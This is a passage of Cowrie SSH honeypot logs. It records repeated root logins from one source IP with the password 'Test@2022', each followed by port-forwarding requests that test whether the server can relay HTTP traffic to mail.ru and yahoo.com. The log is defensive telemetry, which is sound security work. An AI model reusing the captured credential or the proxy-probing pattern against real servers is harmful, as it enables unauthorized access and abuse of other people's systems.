519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:36.798320Z","src_ip":"77.83.207.83","session":"bb1c716ab905"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.048699Z","src_ip":"77.83.207.83","session":"bb1c716ab905"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14185,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:14185","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.100451Z","session":"bb1c716ab905"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.150820Z","src_ip":"77.83.207.83","session":"bb1c716ab905"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":2210,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:2210","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.292837Z","session":"bb1c716ab905"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.343338Z","src_ip":"77.83.207.83","session":"bb1c716ab905"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":22151,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22151","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.484610Z","session":"bb1c716ab905"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.534941Z","src_ip":"77.83.207.83","session":"bb1c716ab905"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.586073Z","src_ip":"77.83.207.83","session":"bb1c716ab905"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":4368,"dst_ip":"1.2.3.4","dst_port":22,"session":"02346b276f15","protocol":"ssh","message":"New connection: 77.83.207.83:4368 (1.2.3.4:22) [session: 02346b276f15]","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.636565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.637390Z","src_ip":"77.83.207.83","session":"02346b276f15"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.688668Z","src_ip":"77.83.207.83","session":"02346b276f15"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.943348Z","src_ip":"77.83.207.83","session":"02346b276f15"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1576,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:1576","sensor":"my-vps","timestamp":"2025-08-31T03:48:37.995045Z","session":"02346b276f15"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:38.046091Z","src_ip":"77.83.207.83","session":"02346b276f15"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":26207,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:26207","sensor":"my-vps","timestamp":"2025-08-31T03:48:38.189377Z","session":"02346b276f15"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:38.240356Z","src_ip":"77.83.207.83","session":"02346b276f15"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":10448,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10448","sensor":"my-vps","timestamp":"2025-08-31T03:48:38.385442Z","session":"02346b276f15"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:38.436595Z","src_ip":"77.83.207.83","session":"02346b276f15"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:38.488384Z","src_ip":"77.83.207.83","session":"02346b276f15"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":4469,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd644acee65e","protocol":"ssh","message":"New connection: 77.83.207.83:4469 (1.2.3.4:22) [session: bd644acee65e]","sensor":"my-vps","timestamp":"2025-08-31T03:48:38.536757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:38.545995Z","src_ip":"77.83.207.83","session":"bd644acee65e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:38.586925Z","src_ip":"77.83.207.83","session":"bd644acee65e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:38.835398Z","src_ip":"77.83.207.83","session":"bd644acee65e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30668,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:30668","sensor":"my-vps","timestamp":"2025-08-31T03:48:38.886652Z","session":"bd644acee65e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:38.936666Z","src_ip":"77.83.207.83","session":"bd644acee65e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":14444,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:14444","sensor":"my-vps","timestamp":"2025-08-31T03:48:39.080211Z","session":"bd644acee65e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:39.130076Z","src_ip":"77.83.207.83","session":"bd644acee65e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":16991,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:16991","sensor":"my-vps","timestamp":"2025-08-31T03:48:39.272243Z","session":"bd644acee65e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:39.322101Z","src_ip":"77.83.207.83","session":"bd644acee65e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:39.372745Z","src_ip":"77.83.207.83","session":"bd644acee65e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":4558,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a1d6d09535c","protocol":"ssh","message":"New connection: 77.83.207.83:4558 (1.2.3.4:22) [session: 7a1d6d09535c]","sensor":"my-vps","timestamp":"2025-08-31T03:48:39.422951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:39.433166Z","src_ip":"77.83.207.83","session":"7a1d6d09535c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:39.473853Z","src_ip":"77.83.207.83","session":"7a1d6d09535c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:39.725635Z","src_ip":"77.83.207.83","session":"7a1d6d09535c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":25402,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:25402","sensor":"my-vps","timestamp":"2025-08-31T03:48:39.776719Z","session":"7a1d6d09535c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:39.827134Z","src_ip":"77.83.207.83","session":"7a1d6d09535c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":29012,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:29012","sensor":"my-vps","timestamp":"2025-08-31T03:48:39.968770Z","session":"7a1d6d09535c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:40.019239Z","src_ip":"77.83.207.83","session":"7a1d6d09535c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":4720,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:4720","sensor":"my-vps","timestamp":"2025-08-31T03:48:40.165034Z","session":"7a1d6d09535c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:40.215708Z","src_ip":"77.83.207.83","session":"7a1d6d09535c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:40.267054Z","src_ip":"77.83.207.83","session":"7a1d6d09535c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":4662,"dst_ip":"1.2.3.4","dst_port":22,"session":"b77de67c42b9","protocol":"ssh","message":"New connection: 77.83.207.83:4662 (1.2.3.4:22) [session: b77de67c42b9]","sensor":"my-vps","timestamp":"2025-08-31T03:48:40.316277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:40.317425Z","src_ip":"77.83.207.83","session":"b77de67c42b9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:48:40.367719Z","src_ip":"77.83.207.83","session":"b77de67c42b9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:48:40.619100Z","src_ip":"77.83.207.83","session":"b77de67c42b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15556,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15556","sensor":"my-vps","timestamp":"2025-08-31T03:48:40.671777Z","session":"b77de67c42b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:40.723221Z","src_ip":"77.83.207.83","session":"b77de67c42b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":27928,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:27928","sensor":"my-vps","timestamp":"2025-08-31T03:48:40.864812Z","session":"b77de67c42b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:40.915144Z","src_ip":"77.83.207.83","session":"b77de67c42b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":8988,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:8988","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.056662Z","session":"b77de67c42b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.107163Z","src_ip":"77.83.207.83","session":"b77de67c42b9"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.158526Z","src_ip":"77.83.207.83","session":"b77de67c42b9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":4744,"dst_ip":"1.2.3.4","dst_port":22,"session":"103c4038b0e2","protocol":"ssh","message":"New connection: 77.83.207.83:4744 (1.2.3.4:22) [session: 103c4038b0e2]","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.207417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:48:41.217518Z","src_ip":"77.83.207.83","session":"103c4038b0e2"}
